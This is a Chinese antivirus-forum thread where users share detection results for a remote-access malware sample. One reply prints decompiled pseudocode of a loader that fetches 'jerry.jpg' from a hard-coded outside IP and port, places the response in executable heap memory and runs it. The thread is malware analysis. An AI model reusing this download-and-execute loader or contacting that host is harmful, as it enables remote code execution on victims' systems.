查看: 2050|回复: 22
收起左侧

[病毒样本] 远控

[复制链接]
dght432
发表于 2024-4-13 19:21:46 | 显示全部楼层 |阅读模式

文件后缀exe
360扫描双击miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
天狐狐狐 + 1 感谢支持,欢迎常来: )

查看全部评分

anxiety520
发表于 2024-4-13 19:41:06 | 显示全部楼层
本帖最后由 anxiety520 于 2024-4-13 20:35 编辑

卡巴
事件:我们发现入侵者可以使用一个应用程序来损坏您的计算机或个人数据。
组件:文件反病毒
结果描述:检测到
类型:可能造成伤害的软件
名称:VHO:HackTool.Win64.AmsiETWPatch.fn
精度: 完全正确
威胁级别:中
对象类型:文件
对象名称:ac8889a871622480958b40ce8a69f2e1a00e3aaca66f4ea691c48e36fe7785f7.exe
原因:云保护
后来改报木马了
事件:检测到恶意对象
组件:文件反病毒
结果描述:检测到
类型:木马
名称:UDS:Trojan-Spy.Win32.Stealer
精度: 完全正确
威胁级别:高
对象类型:文件
对象名称:ac8889a871622480958b40ce8a69f2e1a00e3aaca66f4ea691c48e36fe7785f7.exe
原因:云保护


UNknownOoo
发表于 2024-4-13 19:41:17 | 显示全部楼层
火绒
扫描&运行:MISS
453125415
发表于 2024-4-13 20:27:23 | 显示全部楼层
360扫描miss
sanhu35
发表于 2024-4-13 20:29:14 | 显示全部楼层
键盘记录
hansyu
发表于 2024-4-13 20:40:18 | 显示全部楼层
ESET
Suspicious Object

评分

参与人数 1人气 +1 收起 理由
天狐狐狐 + 1 感谢支持,欢迎常来: )

查看全部评分

x-天秤座
发表于 2024-4-13 21:06:18 | 显示全部楼层
双击,无法顺利运行啊。
123456aaaafsdeg
发表于 2024-4-13 21:16:17 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-4-13 22:39:49 | 显示全部楼层

来个大手子打爆一下
  1. reeConsole();
  2.   v18 = 0i64;
  3.   v37 = 0i64;
  4.   v24 = 0i64;
  5.   v28 = 0;
  6.   strcpy(LibFileName, "Winhttp.dll");
  7.   hModule = LoadLibraryA(LibFileName);
  8.   hHeap = HeapCreate(0x40000u, 0i64, 0i64);
  9.   v15 = (void (__cdecl *)())HeapAlloc(hHeap, 8u, 0x1000ui64);

  10.   strcpy(v17, "4lDKsW");
  11.   v3 = (__int64 (__fastcall *)(const wchar_t *, _QWORD, _QWORD, _QWORD, _DWORD))sub_140001000(&v26[3], 12i64, v17);
  12.   v18 = v3(L"Tor", 0i64, 0i64, 0i64, 0);

  13.   strcpy(v13, "TuntbA");
  14.   v4 = (__int64 (__fastcall *)(__int64, const wchar_t *, __int64, _QWORD))sub_140001000(v33, 15i64, v13);
  15.   LOWORD(v5) = 280;
  16.   v37 = v4(v18, L"216.83.59.219", v5, 0i64);

  17.   strcpy(v12, "2,");
  18.   strcpy(v36, "FKsbAX");
  19.   v6 = (__int64 (__fastcall *)(__int64, const wchar_t *, const wchar_t *, _QWORD, _QWORD, _QWORD, _DWORD))sub_140001000(v11, 19i64, v36);
  20.   v24 = v6(v37, L"GET", L"jerry.jpg", 0i64, 0i64, 0i64, 0);
  21. C6");
  22.   v7 = (__int64 (__fastcall *)(__int64, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD))sub_140001000(v20, 19i64, v30);
  23.   v38 = v7(v24, 0i64, 0i64, 0i64, 0, 0, 0i64);

  24.   strcpy(v26, "'");
  25.   strcpy(v16, "LcuBpW");
  26.   v8 = (__int64 (__fastcall *)(__int64, _QWORD))sub_140001000(v25, 23i64, v16);
  27.   v38 = v8(v24, 0i64);

  28.   strcpy(v35, "eo5TSd");
  29.   qmemcpy(v10, "o/", 2);

  30.   strcpy(v29, "8Fbrxn");
  31.   qmemcpy(v19, "-3\r}$", 5);

  32.   strcpy(v14, "zZc5Pi");
  33.   v31 = 0i64;
  34.   v27 = 0i64;
  35.   v23 = 0i64;
  36.   while ( 1 )
  37.   {
  38.     v39[0] = 0;
  39.     if ( !v31 )
  40.       v31 = (void (__fastcall *)(__int64, int *))sub_140001000(v32, 26i64, v35);
  41.     v31(v24, v39);
  42.     if ( !v39[0] )
  43.       break;
  44.     memset(v40, 0, sizeof(v40));
  45.     if ( !v27 )
  46.       v27 = (void (__fastcall *)(__int64, char *, __int64, int *))sub_140001000(v10, 16i64, v29);
  47.     v27(v24, v40, 800i64, v39);
  48.     qmemcpy((char *)v15 + v28, v40, (unsigned int)v39[0]);
  49.     v28 += v39[0];
  50.   }
  51.   if ( !v23 )
  52.     v23 = (void (__fastcall *)(__int64))sub_140001000(v19, 19i64, v14);
  53.   v23(v24);
  54.   v23(v37);
  55.   v23(v18);
  56.   atexit(v15);
  57.   return 0;
  58. }
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
biue
发表于 2024-4-13 23:38:12 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 12:39 , Processed in 0.130962 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表